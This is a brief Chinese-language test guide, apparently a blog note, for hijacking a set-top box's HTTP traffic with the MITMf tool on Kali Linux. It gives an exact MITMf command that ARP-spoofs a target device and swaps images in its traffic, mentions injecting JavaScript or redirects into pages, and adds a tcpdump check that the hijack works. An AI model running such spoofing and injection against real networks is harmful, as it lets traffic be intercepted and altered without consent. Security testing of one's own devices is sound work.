1、测试步骤

  1. 安装VirtualBox;

  2. 安装kaili系统
    在VirtualBox新建一台虚拟机,安装kali操作系统

    1
    https://www.kali.org/downloads/
  3. 安装MITMf工具
    在kali系统中安装MITMf工具

    1
    https://github.com/byt3bl33d3r/MITMf/blob/master/README.md
  4. 开始测试
    使用MITMF工具里的Spoof模块的arp攻击劫持机顶盒流量,再用Inject模块向返回的HTML页面注入JS代码或者跳转;可参考:

    1
    http://www.361doc.com/content/17/0123/17/33093582_624375844.shtml

2、关键命令

1
2
cd /usr/local/bin/MITMf/
python mitmf.py -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.13 --imgrand --img-dir /home

这个命令可以替换HTTP流量里的图片(图片文件放到/home),但是会把所有图片换掉,随机替换,无法指定。

1
tcpdump -i eth0 ip host 192.168.1.13

上面的命令可以观察流量是否被劫持过来,可以辅助定位问题。
注意:如果http服务的端口不是80,那么需要修改core/utils.py文件,找到其中的80替换即可。